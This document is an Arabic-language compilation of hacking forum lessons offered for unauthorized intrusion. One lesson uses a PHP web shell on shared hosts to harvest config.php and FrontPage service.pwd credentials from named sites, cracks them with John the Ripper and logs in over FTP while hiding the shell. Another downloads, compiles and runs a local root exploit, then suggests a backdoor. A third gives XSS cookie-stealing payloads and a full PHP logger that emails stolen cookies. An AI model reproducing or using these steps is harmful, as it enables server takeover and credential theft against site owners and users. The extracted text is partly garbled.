‫ونمبداء فى استخدام الشل‪ ‬‬ ‫عن طريق المتصفح وبیكون فیه سطر اوامر مثل اللیونكس تمام ونفس اوامر‪ ‬‬ ‫اللیونكس ھى اوامر‪ ‬‬ ‫‪ phpshell‬علشان كدانا بنصحك بعد قرائة الدرس البحث عن اوامر اللیونكس‪ ‬‬ ‫كده تمام احنا على الشل‪ ‬‬ ‫تعمل ايه انت الن لیس من صلحیاتك انك تعدل فى اى شىء لكنك مسموح‪ ‬‬ ‫لك بقرائة مجموعة كبیرة جدا من ملفات السرفر‪ ‬‬


‫وديه میزة كبیرة جدا لزم نستغلھا طیب انا اعرف كلمات السر منین ؟‪ ‬‬ ‫طبعا كل الشركات المستضیفة بتحاول توفر افضل الخدمات للمواقع المستضافة‬ ‫ذى دعم الفرونت بیج‪ ‬‬ ‫وده بیكون لعبتنا وما تنسى الشیل ما بعمل العلى سرفرات الیونكس‪ ‬‬ ‫اللیونكس وفى الحالة العادية مش الساف مود‪ ‬‬ ‫بعض اوامر الشیل‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ A‬‬ ‫‪ access :‬لفحص ملف من حیث امكانیه القراءة ‪ ,‬الكتابة‪ ..‬‬ ‫‪at :‬لتنفیذ امر في تاريخ ووقت معین‪ ‬‬ ‫‪alarm :‬لعمل منبه‪ ‬‬ ‫‪accept :‬لقبول اتصال على سوكیت‪ .‬‬ ‫‪ B‬‬ ‫‪batch :‬لتنفیذ امر عندما يحصل على تصريح‪ ‬‬ ‫‪buildhash :‬مدقق املئي‪ ‬‬ ‫‪ C‬‬ ‫‪ :‬‬ ‫‪ cat‬لعرض محتوى اكثر من ملف مع بعض‬ ‫‪ :‬‬ ‫‪cd‬لتغیر الدلیل الذي انت علیه‬ ‫‪ :‬‬ ‫‪ chmod‬لتغیر تصريح دخلول ملف معین‬ ‫‪ :‬‬ ‫‪chown‬لتغیر مالك ملف معین‬ ‫‪ :‬‬ ‫‪clear‬لمسح كل الذي على الشاشة‬ ‫‪ :‬‬ ‫‪cmp‬لمقارنة ملفین‬ ‫‪ 104‬‬ ‫‪cp‬لنسخ الملفات ‪ :‬‬ ‫‪crypt‬لتشفیر و فك تشفیر الملفات ‪ :‬‬ ‫‪csplit‬لتقسیم الملف الى عدة ملفات ‪ :‬‬ ‫‪ :‬‬ ‫‪ cu‬لطلب تريمنال يونكس اخر‬ ‫‪ D‬‬ ‫‪date‬لظھار التاريخ و الساعة ‪ :‬‬ ‫‪:‬‬ ‫‪df‬لتقديم تقرير عن مساحه القرص ( المساحه الخالیة( ‪..‬‬ ‫‪diff‬لمقارنه ملفین ‪ :‬‬ ‫‪3diff‬لمقارنه ‪ 3‬ملفات او اكثر ‪ :‬‬ ‫‪dircmp‬لمقارنه دلیلن ‪ :‬‬ ‫‪ :‬‬ ‫‪du‬تقرير عن مساحه القرض المستخدم‬ ‫‪ E‬‬ ‫‪echo :‬يستخدم لظھ ار سطر نكتب فیه تیكست‪ ‬‬ ‫) ‪text editor : ed‬مثل الورد يعني(‪ ‬‬ ‫‪egrep :‬مثل المر ‪ grep‬‬ ‫) ‪text editor : ex‬مثل الورد يعني(‪ ‬‬ ‫‪ F‬‬ ‫‪file :‬للتقرير عن نوع ملف‪ ‬‬ ‫‪find :‬للبحث عن ملفات‪ ‬‬ ‫‪finger :‬تقرير عن مستخدم‪ ‬‬ ‫‪ G‬‬ ‫‪++g :‬كومبیلر لل ‪ C++‬و‪ C‬‬ ‫‪gcc :‬كومبیلر لل ‪ C++‬و‪ C‬‬ ‫‪ :‬‬ ‫‪grep‬يستخدم للبحث عن شئ داخل ملف‬ ‫‪gzip‬لضغط ملفات ‪ :‬‬ ‫‪gunzip‬لضغط ملفات ‪ :‬‬ ‫‪ 204‬‬


‫‪ H‬‬ ‫‪haltsys :‬لغلق النظام‪ ‬‬ ‫‪head :‬لظھار اول ‪ 01‬اسطر من الملف‪ ‬‬ ‫‪ I‬‬ ‫‪ispell :‬مدقق املئي‪ ‬‬ ‫‪ K‬‬ ‫‪** kill :‬لنھاء عملیه‪ ‬‬ ‫‪ L‬‬ ‫‪line :‬لقراءة ملف سطر معین في ملف‪ ‬‬ ‫‪ln :‬لعمل لینك ملف معین‪ ‬‬ ‫‪logname :‬للحصول على اسم الدخول الخاص بك‬ ‫‪lpr :‬ارسال طلب للطباعه‪ ‬‬ ‫‪lprint :‬للطباعه بالطابعه المحلیه‪ ‬‬ ‫‪lpstat :‬لتقديم تقرير عن حاله الطباعه‪ ‬‬ ‫‪lpq :‬لتقديم تقرير عن حاله الطباعه‪ ‬‬ ‫‪ls :‬لعرض محتويات مجلد‪ ‬‬ ‫‪ M‬‬ ‫‪mail :‬لرسال و استقبال ايمیلت‪ ‬‬ ‫‪man :‬للحصول على معلومات عن اي امر‪ ‬‬ ‫‪mkdir :‬لعمل دلیل جديد‪ ‬‬ ‫‪more :‬لعرض الملفات‪ ‬‬ ‫‪ 304‬‬ ‫‪ P‬‬ ‫‪passwd :‬لنشاء كملة سر او تغیره‪ ‬‬ ‫‪pr :‬لطباعه ملف‪ ‬‬ ‫‪ps :‬العملیات عن العملیات التي تم تشغیلھا‪ ‬‬ ‫‪pstat :‬لعرض حالة النظام‪ ‬‬ ‫‪pwd :‬لعرض المسار الذي انت فیه الن‪ ‬‬ ‫‪ R‬‬ ‫‪rm :‬لمسح ملفات او مجلدات خالیه‪ ‬‬ ‫‪rmdir :‬لمسح مجلد خالي‪ ‬‬ ‫اوامر الشیل منقولة من‪ ‬‬ ‫‪ Pharaonics Team‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫نبداء بالسھل الول‪ ‬‬ ‫وھو البحث عن كلمات السر لقواعدالبیانات‪ ‬‬ ‫لو عاوز تخترق قواعد البیانات وكلمات السر الغیر مشفرة اكتب‪ ‬‬ ‫‪ find / ­name config.php‬‬ ‫ھ یجیلك كل البرامج الى فیھا الكونفیج على السرفر بھذا الشكل‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/config.php‬‬ ‫‪usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/_vti_cnf/config‬‬ ‫‪ .php‬‬ ‫‪ usr/local/plesk/apache/vhosts/idks.ws/httpdocs/forum/config.php‬‬ ‫‪usr/local/plesk/apache/vhosts/dudewherestherave.net/httpdocs/phpBB‬‬ ‫‪ 2/config.php‬‬ ‫‪ usr/local/plesk/apache/vhosts/ukraine­today.com/httpdocs/config.php‬‬ ‫‪ usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/forum/config.php‬‬ ‫‪usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/myli‬‬ ‫‪ nks/cache/config.php‬‬


usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/new bb/config.php 404 usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/new s/cache/config.php usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/syst em/cache/config.php usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/blacktalons/admi n/config.php usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/forum/config.php usr/local/plesk/apache/vhosts/kunjip.net/httpdocs/bbs/config.php usr/local/plesk/apache/vhosts/thirdeye­ dod.com/httpdocs/forum/config.php usr/local/plesk/apache/vhosts/thirdeye­ dod.com/httpdocs/phpBB2/config.php ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­­­­­­­­­­­­­­­ ‫وعلشان تعرف تشوف الى داخل الملف تكتب‬ cat /usr/local/plesk/apache/vhosts/thirdeye­ dod.com/httpdocs/phpBB2/config.php ‫راح يظھرلك مثل صفحة الكونفیج‬ ‫وفیھا كلمة المرور والیوزر نیم واسم قاعدة البینات‬ ‫ الى كلنا عرفینه (منتدى) الى امتداده على‬phpBB2 ‫الى بتخص البرنامج‬ ‫الموقع‬ WWW.thirdeye­dod.com/phpBB2 ‫وتقدر تشبك مع قاعدة البیانات من خلل البرنامج ده‬ MySQL­Front ‫طیب احنا الحین خلصنا من كلمات السر الغیر مشفرة ندخل بقى على الجد‬ ‫وذى ما قلت فى العلى كل الشركات بتحاول تقدم افضل دعم للمستخدم‬ ‫ومن ھذه الدواعم‬ ‫الفرونت بیج وده الى راح يفتح لنا البوابة الكبیرة للسرفر‬ ‫انتو طبعا عرفین ان الملف الى بیكون فیه كلمة السر فى الفرونت بیج‬ vti_pvt/service.pwd 405 ‫انا مش ھقولك مكان الملف على السرفر لكنك عارف بالطبع مكانه على‬ ‫الموقع لیش انا مابريد اقول مكانه على السرفر‬ ‫لن كل سرفر له تقسیمة خاصة لنظم الملفات المھ م ايه الحل البديل الحل ھو‬ ‫انك تكتب امر البحث عن الملف‬ find / ­name service.pwd ‫) يعنى فى الجزر الرئیسى عن الملف‬/( ‫احنا فى المر الى فات قولنا ابحث فى‬ ‫وھتكون النتیجة مثل‬service.pwd ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ usr/local/plesk/apache/vhosts/nextstagetheater.com/httpdocs/_vti_pvt /service.pwd usr/local/plesk/apache/vhosts/motherlobe.com/httpdocs/_vti_pvt/servi ce.pwd usr/local/plesk/apache/vhosts/urbanspacesny.com/httpdocs/_vti_pvt/s ervice.pwd usr/local/plesk/apache/vhosts/mysticalgammon.com/httpdocs/_vti_pvt /service.pwd usr/local/plesk/apache/vhosts/qfx.us/httpdocs/_vti_pvt/service.pwd


usr/local/plesk/apache/vhosts/intranet.rpec.net/httpdocs/_vti_pvt/servi ce.pwd usr/local/plesk/apache/vhosts/rayonierpamill.com/httpdocs/_vti_pvt/se rvice.pwd usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service .pwd ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‫ موقع حسب‬001 ‫طبعا ده عدد قلیل جدا من المواقع انت ھیظھرلك على القل‬ ‫عدد المواقع الى على السرفر‬ ‫طیب احنا استفدنا ايه من النواتج للبحث ؟‬ pamillsite.com‫استفدنا كثیر فمثل انا عرفت ان كلمة السر الخاصة بموقع‬ ‫موجودة على المتداد ده‬ usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service .pwd 406 ‫اى انى لو كتبت‬ cat /usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/servic e.pwd ‫راح يعرض لى كلمت السر الخاصة بالموقع شفت ان الموضوع سھل جد وما‬ ‫محتاج اى تعب‬ ‫ناتى لفك التشفیر‬ ‫ل تفك تشفیر موقع وتنتظر الناتج ده مش عملى على الطلق انت تجمع كل‬ ‫كلمات السر الى على السرفر‬ ‫وتضعھا فى ملف واحد باسم‬ passwd.txt ‫وھیكون مثل شكله‬ ­­­­­­­­­­­­­­­­­­­­­ jthomas:p9wJhyXfDlEIk ifabc:uyFtvzEic6WbU joram:dx8064QfE1HfA 2akron:HxcPUY85ni/j hpoe:9B1k8oG5Jp/Uo amwab:6vCYtKGUyLO3s antsi:A2FDHZxUzq2XM hsheini:NI7HeAEGXR1BM nskribne:PDBdOXeHxL6lc .besta:8apscPCSCmLV 2bibic:k8G2BP0kMWdb bobpr:6UgBiD.w6ybRU ­­­­­­­­­­­­­­­­­­­­­ p9wJhyXfDlEIk‫حیث‬ ‫كلمة السر المشفرة‬ ‫الیوزر نیم‬jthomas ‫والبرنامج كدا راح يكون اسرع وھ تحصل على نتائج فى اقل من خمس ثوانى‬ ‫ ھیفدكم اتكككم معاه‬joun ‫واعتقد ان الخ‬ 704 ‫اھل بیكم اخوانى‬ 06 ‫انا راح اعطیكم مجموعة من الوامر تمش علیھ ا بالترتیب وراح تفك اكثر من‬ ‫فى المائة فى اقل من دقیقة‬


‫نبداء على بركة االله‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ john ­single passwd.txt‬‬ ‫‪ john ­savemem:3 passwd.txt‬‬ ‫‪ john ­digits passwd.txt‬‬ ‫‪ john ­i:alpha passwd.txt‬‬ ‫‪ john ­i:all passwd.txt‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫اخوانى اھم شىء الترتیب من العلى‪ ‬‬ ‫بعد اما فكیت كلمة السر الى بتلقیھا فى الملف‪ john.pot‬‬ ‫ھتفتحه على النوت باد ھیظھرلك التى‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ GKFr8t.h31s/6:cipell‬‬ ‫‪ 39JkE7aN1.W7w:ideia‬‬ ‫‪ w5ArwaUy1rfIM:juntolli‬‬ ‫‪ toh9pFhI1.MsQ:pradotel‬‬ ‫‪ 92cXbFL4K4ZcIXE:balada‬‬ ‫‪ 654321:SZqqtC/L8lHOM‬‬ ‫‪ 654321:8fgJCj3Jab0bE‬‬ ‫‪ SCcoLYxDqIGzc:hendrix‬‬ ‫‪ tTkN3kEGY2kCc:metal‬‬ ‫­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫طبعا ذى انتو ما شیفین السطر نصفین كلمة السر المشفرة‪ ‬‬ ‫وكلمة السر بعد الكسر‪ ‬‬ ‫المشفرة ‪ :GKFr8t.h31s/6‬‬ ‫المكسورة‪ :cipell‬‬ ‫طیب ترجع لملف كلمات السر وتبحث عن كلمة السر المشفرة الى انت فكیتھا‬ ‫‪ 804‬‬ ‫ھذه‪ ‬‬ ‫‪ 6/GKFr8t.h31s‬‬ ‫وتشوف ايه الیوزر نیم الخاص بیھا‪ ‬‬ ‫اترككم تكملو مع الخ‪ Evil­Mster‬‬ ‫اھل اخوانى‪ ‬‬ ‫تدخل على ‪ ftp‬الخاص بالموقع وتكتب الیوزر نیم وكلمة السر‪ ‬‬ ‫ھتقولى فى مواقع لما بكتب اف تى بى واسم الموقع ما بیفتح‪ ‬‬ ‫وفى مواقع بدخلنى على الخدمة من غیر كلمة سر ول يوز نیم‪ ‬‬ ‫انا اقوله اكید وده مش مشكلة ممكن نحلھا‪ ‬‬ ‫اكتب‪ ‬‬ ‫‪ /ftp://cipell@pamillsite.com‬‬ ‫حیث ‪ cipell‬الیوزر نیم‪ ‬‬ ‫وھ و راح يسالك عن كلمة المرور وبكدا تدخل على الموقع وتعمل الى انت‪ ‬‬ ‫عاوزه‪ ‬‬ ‫ھتلقى ملفات الموقع فى احد المتدادات التیة‪ ‬‬ ‫­­­­­­­­­­­­‪ ‬‬ ‫‪ www‬‬ ‫او‪ ‬‬ ‫‪ public_html‬‬ ‫او‪ ‬‬ ‫‪ httpdocs‬‬ ‫­­­­­­­­­­­­‪ ‬‬


‫لكنى انصحكم بان تضع الشیل على الموقع وما تغیر شىء فیه ويكون فى‪ ‬‬ ‫مكان مش ظاھر‪ ‬‬ ‫يعنى فولدر للصور او اى شىء من ھذا حتى ما يلحظ صاحب الموقع ويغلقه‬ ‫وما تستفاد انت اى شىء‪ ‬‬ ‫انا كنت تكلمت عن ھدية بالعلى وھ ى انى سوف اعطیكم مجموعة من‪ ‬‬ ‫كلمات السر المشفرة تجربو فیھا‪ ‬‬ ‫نصائح الخ ‪ joun‬والى ھیجبلى كلمة سر مفكوكة لیه شیل ھدية‪ ‬‬ ‫‪ 904‬‬ ‫شوفتم السخاء انا ديما اخوكم وفى الخدمة‪ ‬‬ ‫بس ما تنسوى ارفاق اليمیل الخاص بیكم بكلمة السر المفكوكة‬ ‫واسف على اى تقصیر من ناحیتى ومن المجموعة‪ ‬‬ ‫­­­­­­­­­­­­­‪ ‬‬ ‫‪ 014‬‬ ‫طريقة البحث عن الكسبلويتات ‪ +‬أخذ رووت‪ ‬‬ ‫للكاتب ‪ Cyrus:‬‬ ‫نبدا بأسم االله الرحمن الرحیم‪ ‬‬ ‫راح نتطرق بموضوعنا الى شیئین مھمین‪ :‬‬ ‫‪1‬طريقة البحث عن اكیسبلويتات النظام‪ ‬‬‫‪2‬اخذ رووت على السیرفر‪ ‬‬‫=============================‪ ‬‬ ‫بسم االله نبدأ‪ :-‬‬ ‫‪1‬طريقة البحث عن الكسبلويتات‪ ‬‬‫اول شيء اخوي روح للشیل ‪ phpshell‬واكتب المر التالي‪ :‬‬ ‫كود‪ :‬‬ ‫كود‪ :‬‬ ‫‪ cat /etc/issue‬‬ ‫طیب المر ده حیجبلنا اشیاء مھمة زى النظام واصدار الكیرنل‪ ‬‬ ‫طیب دلوقتى حتقلى ايه الى يطلعلى‪ ‬‬ ‫‪ )Red Hat Linux release 7.3 (Valhalla‬‬ ‫‪ Kernel \r on an \m‬‬ ‫ايوة كدا تمام‪ ‬‬ ‫دلوقتى انت عرفت ان النظام ھوة ‪ red hat linux‬لینكس رد ھات والصدار ‪3.7‬‬ ‫‪ 114‬‬ ‫مممممممم دلوقتى ھذا الصدار فیه لھا اكسبلويتات تعطیك لوكل رووت‬ ‫دلوقتى روح لي موقع سیكورتي ‪ ..‬مثل‪ :‬‬ ‫‪ securityfocus.com‬‬ ‫أو‪ ‬‬ ‫‪ /http://www.securiteam.com‬‬ ‫واكتب في مربع البحث التالي‪ :‬‬ ‫‪ 3.7 Red Hat Linux release‬‬ ‫ودور على اكسبلويت يعطیك لوكل رووت ‪ ..‬‬ ‫طیب انت الحین بتقولي طلعت لي صفحات كثیره وووو‪ ...‬‬ ‫بقوله لو تبي معلومات اشمل ‪ ..‬اقرا عناوينھا ‪ ..‬لین تحصل موضوع عن‪ ‬‬ ‫اكسبلويت يديك لوكل رووت ‪ ..‬وممكن تلقى مواضیع تفیدك‪ ‬‬ ‫ولو ماتبي ‪ ( ..‬انا افضل الطريقه ھ ذي) رح افتح جوجل واكتب مثل‪ :‬‬ ‫‪ Red Hat Linux release 7.3 exploit‬‬ ‫وابحث عن الي فیھا‪ local root‬‬ ‫اوووووو بس انا حصلت ھذا الكسبلويت‪ :‬‬ ‫‪ http://x82.inetcop.org/h0me/c0de/0x82­GNATS_sux.c‬‬ ‫طیب شباب دلوقتى انتھ ینى من القسم الول من الموضوع‪ ..‬‬


‫انشاالله الن فھمتو الطريقه تمام ‪ ..‬‬ ‫===========================‪ ‬‬ ‫‪2‬اخذ رووت على السیرفر‪ ‬‬‫طیب يالشیخ بعد ماحصلت على الكسبلويت للنظام‪ ..‬‬ ‫الحین رح اكتب المر بالشیل‪ :‬‬ ‫‪ 214‬‬ ‫كود‪ :‬‬ ‫‪ id‬‬ ‫وطلعت لي الصلحیات يوزر‪ ‬‬ ‫‪ )uid=33(www­data) gid=33(www­data) groups=33(www­data‬‬ ‫طیب الن ننتقل للملف‪ tmp‬‬ ‫نكتب المر‪ ‬‬ ‫كود‪ :‬‬ ‫‪ cd /tmp‬‬ ‫عشان ندخل الملف‪ tmp‬‬ ‫وبعدھا نكتب المر‪ ‬‬ ‫كود‪ :‬‬ ‫‪ pwd‬‬ ‫وراح يطلع لك‪ ‬‬ ‫‪ /tmp‬‬ ‫ھذا معناه انك اكید بملف ‪ tmp‬ـ (‪ )6‬‬ ‫طیب الحین نكتب المر ‪ wget‬بالشیل‪ ‬‬ ‫واذا طلع لنا كذا‪ :‬‬ ‫‪ wget: missing URL‬‬ ‫‪ ..........‬‬ ‫يعني تمام‪ ‬‬ ‫واذا طلع كلم يختلف عن الي طلع لي قبل شوي ‪ ..‬لزم نسوي تصريح ‪777‬‬ ‫والطريقه ھي اكتب المر ھذا‪ :‬‬ ‫كود‪ :‬‬ ‫‪ 314‬‬ ‫‪ chmod 777 tmp‬‬ ‫المھم الن‪ ..‬‬ ‫نروح نكتب المر ھذا‪ :‬‬ ‫‪ ­28[IMG]wget http://x82.inetcop.org/h0me/c0de/0x‬‬ ‫‪ ]GNATS_sux.c[/IMG‬‬ ‫عشان نجیب الكسبلويت للشیل‪ ..‬‬ ‫وبعدھا نكتب المر‪ :‬‬ ‫‪ ls‬‬ ‫وتطلع لنا الملفات الي بـ‪ tmp‬‬ ‫وراح يطلع من ضمنھا الملف ‪ :‬‬ ‫‪ 0x82­GNATS_sux.c‬‬ ‫تمام الشغل الن ‪ %001‬‬ ‫طیب نسوي كومبايل للملف ‪ 0x82­GNATS_sux.c‬‬ ‫بالطريقه ھذي‪ :‬‬ ‫كود‪ :‬‬ ‫‪ gcc ­o 0x82­GNATS_sux 0x82­GNATS_sux.c‬‬ ‫يعني نكتب المر‪ :‬‬ ‫‪ gcc ­o‬‬ ‫وبعده اسم ملف الكسبلويت‪ ‬‬ ‫وبعد اسم ملف الكسبلويت نكتب اسم الملف مع المتداد وھو‪.c‬‬


‫طیب الن بعد كذا نكتب المر‪ :‬‬ ‫‪ 414‬‬ ‫‪ ls‬‬ ‫وراح تطلع لنا الملفات مره اخرى الي بملف الـ‪ tmp‬‬ ‫راح تلحظ وجود الملف نفسه ولكن بدون امتداد بالشكل كذا‪ :‬‬ ‫‪ 0x82­GNATS_sux‬‬ ‫‪ 0x82­GNATS_sux.c‬‬ ‫وھ ذا يعني ان كل شيء میه میه واننا سوينا كومبیل للملف‪ ‬‬ ‫طیب الن نشغل الملف ‪ 0x82­GNATS_sux‬‬ ‫بالمر‪ :‬‬ ‫كود‪ :‬‬ ‫‪ ][IMG]./0x82­GNATS_sux[/IMG‬‬ ‫طیب بعد كذا نروح نكتب بالشیل المر‪ :‬‬ ‫‪ id‬‬ ‫اووووووووه بس انت الن رووت‪ ‬‬ ‫وطلعت لك الصلحیات رووت‪ ‬‬ ‫ھنیئا لك‪ ‬‬ ‫طیب الن ياشباب بعد كذا بتقولون وش اسوي ‪ ..‬بقولكم رحو ارفعو باكدور‬ ‫عشان تضمن رجوعك للسیرفر باي وقت‪ ‬‬ ‫رح ابحث ھنا بالمنتدى وتجد كل شيء عن الباكدور‪ ..‬‬ ‫أو الرووت كیت على القل‪ ‬‬ ‫طیب بتقولون وش اسوي بعد الباكدور ‪ ..‬راح تسوي اشیاء كثیر مره‪ .‬‬ ‫ابحث عنھا وعاد انت ودماغك‪ ‬‬ ‫وراح اشرح وش تسوي بعد الرووت قريــب إن شاء االله‪ ‬‬ ‫وتمنى منكم ان تستفیدون من الموضوع‪ ‬‬ ‫‪ 514‬‬ ‫استغلل ثغرات‪ xss‬‬ ‫للكاتب‪ Linux_Drox:‬‬ ‫الن ھذا اول درس لي بھذا القسم وھو يتكلم عن كیفیه استغلل ثغرات‪ ‬‬ ‫‪ xss‬‬ ‫طیب نأتي الن الى الكود المھم في ثغرات‪ xss‬‬ ‫ھذا كود سكربت خبیث يأتي بمعلومات الكوكیز تجده دائما ً في ثغرات‪ xss‬‬ ‫‪ ><Script>javascript:alert(document.******)</Script‬‬ ‫الن الكود ھذا لم يكون بالثغره سوف يظھر لك الكوكیز تبعك وھو يحتوي على‪ ‬‬ ‫نقاط مھمه وھي‪ :‬‬ ‫‪1‬رقم العضويه‪ ‬‬‫‪2‬الباسورد مشفر ‪ 5md‬‬‫ ‪3‬الباسورد مشفر ‪ Hash‬‬‫ورقم الستايل وغیره ‪ ,,‬على حسب نوعیه البرنامج المصاب!‪ ‬‬ ‫طیب الحین وجدت ھذا الكود سوف نربطه باللوج‪ ‬‬ ‫ماھو اللوج ؟‪ ‬‬ ‫اللوج ھ ذا تربطه مع السكربت الذي ياتي بالكوكیز ‪ ,,‬وبعد ان تربطه كل من فتح‬ ‫السكربت وھ و مربوط باللوج سوف يسجل معلومات الكوكیز تبعه باللوج او يرسل‬ ‫الى ايمیلك ( على حسب اللوج)‪ ‬‬ ‫طیب الن بعد ما ربطته اصبح الرابط‪ :‬‬ ‫‪ ******.<Script>location.href="http://www.xxxxx.com/log.php?id="+document‬‬ ‫‪ ></Script‬‬ ‫‪ 614‬‬ ‫تمام الن‪ :‬‬ ‫‪ = http://www.xxx.com /‬الموقع المربوط فیه اللوج‪ ‬‬


‫= ‪log.php‬اسم ملف اللوج‪ ‬‬ ‫طیب الحین نرفع اللوج على اي موقع عندك وبعد كذا تستبدل‪ ‬‬ ‫‪ www.xxx.com/log.php‬برابط اللوج الي عندك‪ ‬‬ ‫المھم الن ھذا السكربت اصبح جاھزا للستعمال سوف نضعه بكود الثغره‪ ‬‬ ‫ونستبدل‪ :‬‬ ‫‪ ><Script>javascript:alert(document.******)</Script‬‬ ‫بـ‪ ‬‬ ‫‪******.<Script>location.href="http://www.xxxxx.com/log.php?id="+document‬‬ ‫‪ ></Script‬‬ ‫الن نخلي مثل المدير العام او اي عضو تبي تسرق الكوكیز تبعه انه يفتح الرابط‬ ‫بتقول كیف بقولك ياااولد انت وراااااسك(‪ )6‬عاد بطريقتك خلیه يفتح الرابط‪ ‬‬ ‫طیب الحین بتقولي واالله فضیحه يابو خالد لم اخلیه يفتح الرابط يطلع عنده‪ ‬‬ ‫اللوج وبیكشفني‪ ‬‬ ‫بقوله ول يھ مك اخوي نربطه كمان بموقع للتمويه‪ ‬‬ ‫مثل نربطه بموقع ‪ http://www.google.com /‬بحیث انه لم يفتح الثغره‪ ‬‬ ‫والمربوط فیھ ا اللوج وموقع جوجل راح يتحول اوتوماتیك الى جوجل وبكذا‪ ‬‬ ‫مايشك‪ ‬‬ ‫‪ 714‬‬ ‫بتقول كیف يابو خالد بقولك كذا نضع بعد رابط اللوج‪ :‬‬ ‫&‪ re=www.google.com‬‬ ‫بس‪ ‬‬ ‫بحیث يكون بعد & يوجد‪ id ... ‬الخ‪ ‬‬ ‫يعني يكون الكود‪ :‬‬ ‫‪<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id‬‬ ‫>‪ ="+document.******</Script‬‬ ‫طبعا انت استبدل‪ http://www.google.com/ ‬باي موقع تبغاه ويفضل يكون‪ ‬‬ ‫الموقع الي مصاب فیه الثغره‪ (1) ‬‬ ‫طیب الحین تقول كذا تمام يابو خالد ياالله عطنا مثااال‪ ‬‬ ‫بعطیكم مثال لثغره الي اكتشفتھا انا بمنتديات‪ :Invision Power Board‬‬ ‫الكود للثغره‪ :‬‬ ‫=‪ http://xxx.com/forums/index.php?act=idx‬‬ ‫>‪ '><script>alert(document.******)</script‬‬ ‫احنا راح نستبدل‪ :‬‬ ‫>‪ <Script>javascript:alert(document.******)</Script‬‬ ‫بـ‪ ‬‬ ‫‪<Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id‬‬ ‫>‪ ="+document.******</Script‬‬ ‫واستبدل ھنا موقع جوجل باي موقع تبغاه‪ ‬‬ ‫ورابط اللوج‪ www.xxx.com/log.php ‬باللوج تبعك‪ ‬‬ ‫‪ 418‬‬ ‫====================‪ ‬‬ ‫تطبیق‪ :‬‬ ‫التطبیق ھنا‪ :‬‬ ‫‪http://www.mahrum.com/forums/index.php?act=idx='><script>alert(document.‬‬ ‫>‪ ******)</script‬‬ ‫===================‪ ‬‬ ‫اللوج‪ :‬‬ ‫‪ <?php‬‬ ‫­‪ // Thnx For Security 4 Arab ­ [url]http://www.s4a.cc[/url] ‬‬ ‫]‪ [url]http://www.s4a.com/forum[/url‬‬


//­­­­­ S4a Logger v0.10 ­­­­­// // Star //Your Email ­­::­­ $ToGet = "Linux_Drox@hotmail.com"; //////////////////////////////// $Ip = $REMOTE_ADDR; $Sys = $HTTP_USER_AGENT; ////////////////////////////////////////////// if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} // $Time = date("l dS of F Y h:i:s A"); $Hdr = 'From: Logger <logger@secourty>'; $Msg = ' Hi ,, Mr.Attacker :D ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­ Thnx For S4a ,, Security For Arab Forum ­ ­ s4a ­ ­ s4a froum ­ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­ This Script Coded By Devil­00 [ Devil From Palestine ] ­ ­ <devil­00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@yahoo.com> ­ 419 ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­ IP ::­ [ ' .$Ip.' ] ­ System ::­ [ '.$Sys.' ] ­ The ****** ::­ [ '.$id.' ] ­ Time ::­ [ '.$Time.' ] ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­ root@devil00 ~ ./evilcat /etc/passwd ­ ­ root@devil00 ~ ./s4acracker passwd ­­log <log.log> && ­ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ '; $send = mail($ToGet,'S4a ­ [ New****** ]',$Msg,$Hdr); // /* Refresh code ,, By Devil­00 [ 25/5/2005 ] << v0.10 */ if(isset($_GET["re"])){ $Refresh = $_GET["re"]; if($Refresh == ""){ mail ($ToGet,'S4a ­ [Error]','Refresh Is Set And Its Empty !!',$Hdr); }else{ header("location:".$Refresh); } } // ?> :‫استبدل ھنا‬ $ToGet = "Linux_Drox@hotmail.com"; Linux_Drox@hotmail.com: ‫اليمیل‬ !‫باليمیل تبعك‬ ‫ طبعا افتح المفكره وحط الكود ولتنسى تغیر اليمیل‬php ‫واحفظه بامتداد‬


